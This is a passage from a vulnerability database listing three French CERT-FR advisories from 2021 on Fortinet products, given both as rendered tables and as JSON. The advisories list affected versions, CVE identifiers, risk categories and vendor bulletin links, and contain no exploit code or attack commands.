"url": "https://www.fortiguard.com/psirt/FG-IR-21-156"
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet FG-IR-21-188 du 8 d\u00e9cembre 2021",
"url": "https://www.fortiguard.com/psirt/FG-IR-21-188"
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet FG-IR-20-158 du 8 d\u00e9cembre 2021",
"url": "https://www.fortiguard.com/psirt/FG-IR-20-158"
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet FG-IR-21-178 du 8 d\u00e9cembre 2021",
"url": "https://www.fortiguard.com/psirt/FG-IR-21-178"
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet FG-IR-21-131 du 8 d\u00e9cembre 2021",
"url": "https://www.fortiguard.com/psirt/FG-IR-21-131"
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet FG-IR-21-004 du 8 d\u00e9cembre 2021",
"url": "https://www.fortiguard.com/psirt/FG-IR-21-004"
}
]
}
CERTFR-2021-AVI-845
Vulnerability from certfr_avis - Published: 2021-11-04 - Updated: 2021-11-04
De multiples vulnérabilités ont été découvertes dans les produits Fortinet. Certaines d'entre elles permettent à un attaquant de provoquer un déni de service à distance, un contournement de la politique de sécurité et une atteinte à la confidentialité des données.
Solution
Se référer au bulletin de sécurité de l'éditeur pour l'obtention des correctifs (cf. section Documentation).
NoneImpacted products
| Vendor | Product | Description | ||
|---|---|---|---|---|
| Fortinet | N/A | FortiClientMac versions antérieures à 6.4.6, 7.0.1 | ||
| Fortinet | FortiADC | FortiADC versions antérieures à 5.4.4, 6.0.1 | ||
| Fortinet | FortiSIEM | FortiSIEM Windows Agent versions antérieures à 4.1.5 | ||
| Fortinet | N/A | FortiClientWindows versions antérieures à 6.4.3, 7.0.2 | ||
| Fortinet | FortiAnalyzer | FortiAnalyzer versions antérieures à 6.0.7, 6.4.5 | ||
| Fortinet | FortiSIEM | FortiSIEM versions antérieures à 6.3.0 | ||
| Fortinet | FortiClientEMS | FortiClientEMS versions antérieures à 6.4.2, 7.0.0 | ||
| Fortinet | FortiDDoS | FortiDDoS-F versions antérieures à 6.2.0 | ||
| Fortinet | FortiPortal | FortiPortal versions antérieures à 5.2.7, 5.3.7, 6.0.6, 7.0.0 | ||
| Fortinet | FortiDDoS | FortiDDoS versions antérieures à 5.5.0 | ||
| Fortinet | FortiManager | FortiManager versions antérieures à 6.4.7, 7.0.2 | ||
| Fortinet | FortiGate | FortiGate versions antérieures à 6.4.7 |
References
| Title | Publication Time | Tags | ||||||||||||||||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||||||||||||||||||||
{
"$ref": "https://www.cert.ssi.gouv.fr/openapi.json",
"affected_systems": [
{
"description": "FortiClientMac versions ant\u00e9rieures \u00e0 6.4.6, 7.0.1",
"product": {
"name": "N/A",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "FortiADC versions ant\u00e9rieures \u00e0 5.4.4, 6.0.1",
"product": {
"name": "FortiADC",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "FortiSIEM Windows Agent versions ant\u00e9rieures \u00e0 4.1.5",
"product": {
"name": "FortiSIEM",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "FortiClientWindows versions ant\u00e9rieures \u00e0 6.4.3, 7.0.2",
"product": {
"name": "N/A",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "FortiAnalyzer versions ant\u00e9rieures \u00e0 6.0.7, 6.4.5",
"product": {
"name": "FortiAnalyzer",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "FortiSIEM versions ant\u00e9rieures \u00e0 6.3.0",
"product": {
"name": "FortiSIEM",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "FortiClientEMS versions ant\u00e9rieures \u00e0 6.4.2, 7.0.0",
"product": {
"name": "FortiClientEMS",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "FortiDDoS-F versions ant\u00e9rieures \u00e0 6.2.0",
"product": {
"name": "FortiDDoS",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "FortiPortal versions ant\u00e9rieures \u00e0 5.2.7, 5.3.7, 6.0.6, 7.0.0",
"product": {
"name": "FortiPortal",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "FortiDDoS versions ant\u00e9rieures \u00e0 5.5.0",
"product": {
"name": "FortiDDoS",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "FortiManager versions ant\u00e9rieures \u00e0 6.4.7, 7.0.2",
"product": {
"name": "FortiManager",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "FortiGate versions ant\u00e9rieures \u00e0 6.4.7",
"product": {
"name": "FortiGate",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
}
],
"affected_systems_content": null,
"content": "## Solution\n\nSe r\u00e9f\u00e9rer au bulletin de s\u00e9curit\u00e9 de l\u0027\u00e9diteur pour l\u0027obtention des\ncorrectifs (cf. section Documentation).\n",
"cves": [
{
"name": "CVE-2020-12814",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-12814"
},
{
"name": "CVE-2021-26107",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-26107"
},
{
"name": "CVE-2021-36176",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-36176"
},
{
"name": "CVE-2020-15940",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-15940"
},
{
"name": "CVE-2021-42754",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-42754"
},
{
"name": "CVE-2020-15935",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-15935"
},
{
"name": "CVE-2021-36174",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-36174"
},
{
"name": "CVE-2021-36192",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-36192"
},
{
"name": "CVE-2021-36183",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-36183"
},
{
"name": "CVE-2021-36172",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-36172"
},
{
"name": "CVE-2021-41019",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-41019"
},
{
"name": "CVE-2021-36181",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-36181"
},
{
"name": "CVE-2021-32595",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-32595"
}
],
"initial_release_date": "2021-11-04T00:00:00",
"last_revision_date": "2021-11-04T00:00:00",
"links": [],
"reference": "CERTFR-2021-AVI-845",
"revisions": [
{
"description": "Version initiale",
"revision_date": "2021-11-04T00:00:00.000000"
}
],
"risks": [
{
"description": "D\u00e9ni de service \u00e0 distance"
},
{
"description": "Injection de code indirecte \u00e0 distance (XSS)"
},
{
"description": "Contournement de la politique de s\u00e9curit\u00e9"
},
{
"description": "Atteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es"
},
{
"description": "\u00c9l\u00e9vation de privil\u00e8ges"
}
],
"summary": "De multiples vuln\u00e9rabilit\u00e9s ont \u00e9t\u00e9 d\u00e9couvertes dans les produits\nFortinet. Certaines d\u0027entre elles permettent \u00e0 un attaquant de provoquer\nun d\u00e9ni de service \u00e0 distance, un contournement de la politique de\ns\u00e9curit\u00e9 et une atteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es.\n",
"title": "Multiples vuln\u00e9rabilit\u00e9s dans les produits Fortinet",
"vendor_advisories": [
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet FG-IR-20-092 du 02 novembre 2021",
"url": "https://www.fortiguard.com/psirt/FG-IR-20-092"
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet FG-IR-21-043 du 02 novembre 2021",
"url": "https://www.fortiguard.com/psirt/FG-IR-21-043"
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet FG-IR-20-079 du 02 novembre 2021",
"url": "https://www.fortiguard.com/psirt/FG-IR-20-079"
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet FG-IR-21-096 du 02 novembre 2021",
"url": "https://www.fortiguard.com/psirt/FG-IR-21-096"
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet FG-IR-21-104 du 02 novembre 2021",
"url": "https://www.fortiguard.com/psirt/FG-IR-21-104"
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet FG-IR-20-044 du 02 novembre 2021",
"url": "https://www.fortiguard.com/psirt/FG-IR-20-044"
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet FG-IR-21-103 du 02 novembre 2021",
"url": "https://www.fortiguard.com/psirt/FG-IR-21-103"
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet FG-IR-21-102 du 02 novembre 2021",
"url": "https://www.fortiguard.com/psirt/FG-IR-21-102"
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet FG-IR-21-100 du 02 novembre 2021",
"url": "https://www.fortiguard.com/psirt/FG-IR-21-100"
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet FG-IR-21-109 du 02 novembre 2021",
"url": "https://www.fortiguard.com/psirt/FG-IR-21-109"
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet FG-IR-21-074 du 02 novembre 2021",
"url": "https://www.fortiguard.com/psirt/FG-IR-21-074"
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet FG-IR-20-067 du 02 novembre 2021",
"url": "https://www.fortiguard.com/psirt/FG-IR-20-067"
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet FG-IR-21-079 du 02 novembre 2021",
"url": "https://www.fortiguard.com/psirt/FG-IR-21-079"
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet FG-IR-21-175 du 02 novembre 2021",
"url": "https://www.fortiguard.com/psirt/FG-IR-21-175"
}
]
}
CERTFR-2021-AVI-685
Vulnerability from certfr_avis - Published: 2021-09-08 - Updated: 2021-09-08
De multiples vulnérabilités ont été découvertes dans les produits Fortinet. Certaines d'entre elles permettent à un attaquant de provoquer une exécution de code arbitraire à distance, un déni de service à distance et un contournement de la politique de sécurité.
Solution
Se référer au bulletin de sécurité de l'éditeur pour l'obtention des correctifs (cf. section Documentation).
NoneImpacted products
| Vendor | Product | Description | ||
|---|---|---|---|---|
| Fortinet | N/A | FortiAuthenticator versions antérieures à 6.3.1 | ||
| Fortinet | FortiSandbox | FortiSandbox versions antérieures à 3.2.2 | ||
| Fortinet | FortiManager | FortiManager versions 6.4.x antérieures à 6.4.4 | ||
| Fortinet | FortiWeb | FortiWeb versions antérieures à 6.2.5 | ||
| Fortinet | FortiManager | FortiManager versions antérieures à 6.2.8 | ||
| Fortinet | FortiGate | FortiGate versions 7.0.x antérieures à 7.0.1 | ||
| Fortinet | FortiClient | FortiClient pour Linux versions 6.4.x antérieures à 6.4.3 | ||
| Fortinet | FortiGate | FortiGate versions antérieures à 6.4.7 | ||
| Fortinet | FortiWeb | FortiWeb versions 6.3.x antérieures à 6.3.15 | ||
| Fortinet | FortiOS | FortiOS versions 7.0.x antérieures à 7.0.1 | ||
| Fortinet | FortiOS | FortiOS versions antérieures à 6.4.7 | ||
| Fortinet | FortiClient | FortiClient pour Linux versions antérieures à 6.2.9 | ||
| Fortinet | FortiWeb | FortiWeb versions 6.4.x antérieures à 6.4.1 |
References
| Title | Publication Time | Tags | ||||||||||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||||||||||||||
{
"$ref": "https://www.cert.ssi.gouv.fr/openapi.json",
"affected_systems": [
{
"description": "FortiAuthenticator versions ant\u00e9rieures \u00e0 6.3.1",
"product": {
"name": "N/A",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "FortiSandbox versions ant\u00e9rieures \u00e0 3.2.2",
"product": {
"name": "FortiSandbox",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "FortiManager versions 6.4.x ant\u00e9rieures \u00e0 6.4.4",
"product": {
"name": "FortiManager",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "FortiWeb versions ant\u00e9rieures \u00e0 6.2.5",
"product": {
"name": "FortiWeb",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "FortiManager versions ant\u00e9rieures \u00e0 6.2.8",
"product": {
"name": "FortiManager",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "FortiGate versions 7.0.x ant\u00e9rieures \u00e0 7.0.1",
"product": {
"name": "FortiGate",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "FortiClient pour Linux versions 6.4.x ant\u00e9rieures \u00e0 6.4.3",
"product": {
"name": "FortiClient",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "FortiGate versions ant\u00e9rieures \u00e0 6.4.7",
"product": {
"name": "FortiGate",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "FortiWeb versions 6.3.x ant\u00e9rieures \u00e0 6.3.15",
"product": {
"name": "FortiWeb",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "FortiOS versions 7.0.x ant\u00e9rieures \u00e0 7.0.1",
"product": {
"name": "FortiOS",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "FortiOS versions ant\u00e9rieures \u00e0 6.4.7",
"product": {
"name": "FortiOS",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "FortiClient pour Linux versions ant\u00e9rieures \u00e0 6.2.9",
"product": {
"name": "FortiClient",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "FortiWeb versions 6.4.x ant\u00e9rieures \u00e0 6.4.1",
"product": {
"name": "FortiWeb",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
}
],
"affected_systems_content": null,
"content": "## Solution\n\nSe r\u00e9f\u00e9rer au bulletin de s\u00e9curit\u00e9 de l\u0027\u00e9diteur pour l\u0027obtention des\ncorrectifs (cf. section Documentation).\n",
"cves": [
{
"name": "CVE-2021-36179",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-36179"
},
{
"name": "CVE-2019-17655",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-17655"
},
{
"name": "CVE-2021-36169",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-36169"
},
{
"name": "CVE-2020-29012",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-29012"
},
{
"name": "CVE-2021-24016",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-24016"
},
{
"name": "CVE-2021-32600",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-32600"
},
{
"name": "CVE-2021-36182",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-36182"
},
{
"name": "CVE-2021-26116",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-26116"
},
{
"name": "CVE-2021-22123",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-22123"
},
{
"name": "CVE-2021-24017",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-24017"
},
{
"name": "CVE-2021-22127",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-22127"
},
{
"name": "CVE-2020-29013",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-29013"
}
],
"initial_release_date": "2021-09-08T00:00:00",
"last_revision_date": "2021-09-08T00:00:00",
"links": [],
"reference": "CERTFR-2021-AVI-685",
"revisions": [
{
"description": "Version initiale",
"revision_date": "2021-09-08T00:00:00.000000"
}
],
"risks": [
{
"description": "D\u00e9ni de service \u00e0 distance"
},
{
"description": "Ex\u00e9cution de code arbitraire \u00e0 distance"
},
{
"description": "Contournement de la politique de s\u00e9curit\u00e9"
},
{
"description": "Atteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es"
}
],
"summary": "De multiples vuln\u00e9rabilit\u00e9s ont \u00e9t\u00e9 d\u00e9couvertes dans les produits\nFortinet. Certaines d\u0027entre elles permettent \u00e0 un attaquant de provoquer\nune ex\u00e9cution de code arbitraire \u00e0 distance, un d\u00e9ni de service \u00e0\ndistance et un contournement de la politique de s\u00e9curit\u00e9.\n",
"title": "Multiples vuln\u00e9rabilit\u00e9s dans les produits Fortinet",
"vendor_advisories": [
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet FG-IR-21-091 du 07 septembre 2021",
"url": "https://www.fortiguard.com/psirt/FG-IR-21-091"
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet FG-IR-21-116 du 18 ao\u00fbt 2021",
"url": "https://www.fortiguard.com/psirt/FG-IR-21-116"
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet FG-IR-20-189 du 07 septembre 2021",
"url": "https://www.fortiguard.com/psirt/FG-IR-20-189"
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet FG-IR-20-178 du 07 septembre 2021",
"url": "https://www.fortiguard.com/psirt/FG-IR-20-178"
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet FG-IR-20-206 du 07 septembre 2021",
"url": "https://www.fortiguard.com/psirt/FG-IR-20-206"
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet FG-IR-21-068 du 07 septembre 2021",
"url": "https://www.fortiguard.com/psirt/FG-IR-21-068"
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet FG-IR-20-190 du 07 septembre 2021",
"url": "https://www.fortiguard.com/psirt/FG-IR-20-190"
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet FG-IR-21-047 du 07 septembre 2021",
"url": "https://www.fortiguard.com/psirt/FG-IR-21-047"
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet FG-IR-20-241 du 07 septembre 2021",
"url": "https://www.fortiguard.com/psirt/FG-IR-20-241"
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet FG-IR-19-217 du 07 septembre 2021",
"url": "https://www.fortiguard.com/psirt/FG-IR-19-217"
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet FG-IR-20-243 du 07 septembre 2021",
"url": "https://www.fortiguard.com/psirt/FG-IR-20-243"
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet FG-IR-20-070 du 07 septembre 2021",
"url": "https://www.fortiguard.com/psirt/FG-IR-20-070"
}
]
}
CERTFR-2021-AVI-419
Vulnerability from certfr_avis - Published: 2021-06-02 - Updated: 2021-06-02
De multiples vulnérabilités ont été découvertes dans les produits Fortinet. Certaines d'entre elles permettent à un attaquant de provoquer une exécution de code arbitraire à distance, un déni de service à distance et un contournement de la politique de sécurité.
Solution
Se référer au bulletin de sécurité de l'éditeur pour l'obtention des correctifs (cf. section Documentation).
NoneImpacted products
| Vendor | Product | Description | ||
|---|---|---|---|---|
| Fortinet | FortiProxy | FortiProxy versions 2.0.x antérieures à 2.0.2 | ||
| Fortinet | FortiSwitch | FortiSwitch versions 6.4.x antérieures à 6.4.7 | ||
| Fortinet | FortiSwitch | FortiSwitch versions 6.2.x antérieures à 6.2.7 | ||
| Fortinet | FortiWeb | FortiWeb versions 6.2.x antérieures à 6.2.4 | ||
| Fortinet | FortiGate | FortiGate versions 5.6.x antérieures à 6.0.13 | ||
| Fortinet | FortiSwitch | FortiSwitch toutes versions antérieures à 6.0.x et 3.6.x | ||
| Fortinet | FortiGate | FortiGate versions 6.4.0 à 6.4.4 antérieures à 6.4.5 | ||
| Fortinet | FortiWeb | FortiWeb versions 6.3.x antérieures à 6.3.8 | ||
| Fortinet | N/A | FortiAuthenticator versions antérieures à 6.3.0 | ||
| Fortinet | FortiWeb | FortiWeb toutes versions antérieures à 6.1.x, 6.0.x, 5.9.x | ||
| Fortinet | FortiADC | FortiADC versions 6.0.x antérieures à 6.0.2 | ||
| Fortinet | FortiGate | FortiGate versions 6.4.5 antérieures à 7.0.0 | ||
| Fortinet | N/A | FortiWLC versions 8.5.x antérieures à 8.5.4 | ||
| Fortinet | FortiADC | FortiADC versions 6.1.x antérieures à 6.1.1 | ||
| Fortinet | FortiOS | FortiOS versions antérieures à 6.0.3 | ||
| Fortinet | FortiGate | FortiGate versions 5.6.x, 6.0.x et 6.2.x antérieures à 7.0.0 | ||
| Fortinet | FortiADC | FortiADC versions 5.4.x antérieures à 5.4.5 | ||
| Fortinet | FortiProxy | FortiProxy versions 1.2.9, 1.1.x, 1.0.x antérieures à 1.2.10 | ||
| Fortinet | FortiGate | FortiGate versions 6.2.x antérieures à 6.4.6 | ||
| Fortinet | FortiGate | FortiGate versions 6.0.x antérieures à 6.2.8 | ||
| Fortinet | N/A | FortiWLC versions 8.6.x antérieures à 8.6.1 |
References
| Title | Publication Time | Tags | ||||||||||||||||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||||||||||||||||||||
{
"$ref": "https://www.cert.ssi.gouv.fr/openapi.json",
"affected_systems": [
{
"description": "FortiProxy versions 2.0.x ant\u00e9rieures \u00e0 2.0.2",
"product": {
"name": "FortiProxy",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "FortiSwitch versions 6.4.x ant\u00e9rieures \u00e0 6.4.7",
"product": {
"name": "FortiSwitch",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "FortiSwitch versions 6.2.x ant\u00e9rieures \u00e0 6.2.7",
"product": {
"name": "FortiSwitch",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "FortiWeb versions 6.2.x ant\u00e9rieures \u00e0 6.2.4",
"product": {
"name": "FortiWeb",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "FortiGate versions 5.6.x ant\u00e9rieures \u00e0 6.0.13",
"product": {
"name": "FortiGate",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "FortiSwitch toutes versions ant\u00e9rieures \u00e0 6.0.x et 3.6.x",
"product": {
"name": "FortiSwitch",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "FortiGate versions 6.4.0 \u00e0 6.4.4 ant\u00e9rieures \u00e0 6.4.5",
"product": {
"name": "FortiGate",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "FortiWeb versions 6.3.x ant\u00e9rieures \u00e0 6.3.8",
"product": {
"name": "FortiWeb",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "FortiAuthenticator versions ant\u00e9rieures \u00e0 6.3.0",
"product": {
"name": "N/A",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "FortiWeb toutes versions ant\u00e9rieures \u00e0 6.1.x, 6.0.x, 5.9.x",
"product": {
"name": "FortiWeb",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "FortiADC versions 6.0.x ant\u00e9rieures \u00e0 6.0.2",
"product": {
"name": "FortiADC",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "FortiGate versions 6.4.5 ant\u00e9rieures \u00e0 7.0.0",
"product": {
"name": "FortiGate",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "FortiWLC versions 8.5.x ant\u00e9rieures \u00e0 8.5.4",
"product": {
"name": "N/A",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "FortiADC versions 6.1.x ant\u00e9rieures \u00e0 6.1.1",
"product": {
"name": "FortiADC",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "FortiOS versions ant\u00e9rieures \u00e0 6.0.3",
"product": {
"name": "FortiOS",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "FortiGate versions 5.6.x, 6.0.x et 6.2.x ant\u00e9rieures \u00e0 7.0.0",
"product": {
"name": "FortiGate",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "FortiADC versions 5.4.x ant\u00e9rieures \u00e0 5.4.5",
"product": {
"name": "FortiADC",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "FortiProxy versions 1.2.9, 1.1.x, 1.0.x ant\u00e9rieures \u00e0 1.2.10",
"product": {
"name": "FortiProxy",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "FortiGate versions 6.2.x ant\u00e9rieures \u00e0 6.4.6",
"product": {
"name": "FortiGate",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "FortiGate versions 6.0.x ant\u00e9rieures \u00e0 6.2.8",
"product": {
"name": "FortiGate",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "FortiWLC versions 8.6.x ant\u00e9rieures \u00e0 8.6.1",
"product": {
"name": "N/A",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
}
],
"affected_systems_content": null,
"content": "## Solution\n\nSe r\u00e9f\u00e9rer au bulletin de s\u00e9curit\u00e9 de l\u0027\u00e9diteur pour l\u0027obtention des\ncorrectifs (cf. section Documentation).\n",
"cves": [
{
"name": "CVE-2021-26094",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-26094"
},
{
"name": "CVE-2021-26092",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-26092"
},
{
"name": "CVE-2021-26087",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-26087"
},
{
"name": "CVE-2021-26111",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-26111"
},
{
"name": "CVE-2021-24012",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-24012"
},
{
"name": "CVE-2021-26093",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-26093"
},
{
"name": "CVE-2018-13382",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-13382"
},
{
"name": "CVE-2018-13374",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-13374"
},
{
"name": "CVE-2021-22123",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-22123"
},
{
"name": "CVE-2021-22130",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-22130"
}
],
"initial_release_date": "2021-06-02T00:00:00",
"last_revision_date": "2021-06-02T00:00:00",
"links": [
{
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet FG-IR-21-071 du 01 juin 2021",
"url": "https://www.fortiguard.com/psirt/FG-IR-21-071"
}
],
"reference": "CERTFR-2021-AVI-419",
"revisions": [
{
"description": "Version initiale",
"revision_date": "2021-06-02T00:00:00.000000"
}
],
"risks": [
{
"description": "D\u00e9ni de service \u00e0 distance"
},
{
"description": "Injection de code indirecte \u00e0 distance (XSS)"
},
{
"description": "Ex\u00e9cution de code arbitraire \u00e0 distance"
},
{
"description": "Atteinte \u00e0 l\u0027int\u00e9grit\u00e9 des donn\u00e9es"
},
{
"description": "Contournement de la politique de s\u00e9curit\u00e9"
},
{
"description": "Atteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es"
},
{
"description": "\u00c9l\u00e9vation de privil\u00e8ges"
}
],
"summary": "De multiples vuln\u00e9rabilit\u00e9s ont \u00e9t\u00e9 d\u00e9couvertes dans les produits\nFortinet. Certaines d\u0027entre elles permettent \u00e0 un attaquant de provoquer\nune ex\u00e9cution de code arbitraire \u00e0 distance, un d\u00e9ni de service \u00e0\ndistance et un contournement de la politique de s\u00e9curit\u00e9.\n",
"title": "Multiples vuln\u00e9rabilit\u00e9s dans les produits Fortinet",
"vendor_advisories": [
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet FG-IR-21-002 du 01 juin 2021",
"url": "https://www.fortiguard.com/psirt/FG-IR-21-002"
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet FG-IR-20-049 du 30 mai 2021",
"url": "https://www.fortiguard.com/psirt/FG-IR-20-049"
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet FG-IR-20-231 du 01 juin 2021",
"url": "https://www.fortiguard.com/psirt/FG-IR-20-231"
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet FG-IR-21-006 du 01 juin 2021",
"url": "https://www.fortiguard.com/psirt/FG-IR-21-006"
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet FG-IR-18-157 du 01 juin 2021",
"url": "https://www.fortiguard.com/psirt/FG-IR-18-157"
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet FG-IR-21-001 du 01 juin 2021",
"url": "https://www.fortiguard.com/psirt/FG-IR-21-001"
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet FG-IR-20-233 du 30 mai 2021",
"url": "https://www.fortiguard.com/psirt/FG-IR-20-233"
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet FG-IR-20-147 du 01 juin 2021",
"url": "https://www.fortiguard.com/psirt/FG-IR-20-147"
},
{
"published_at": null,
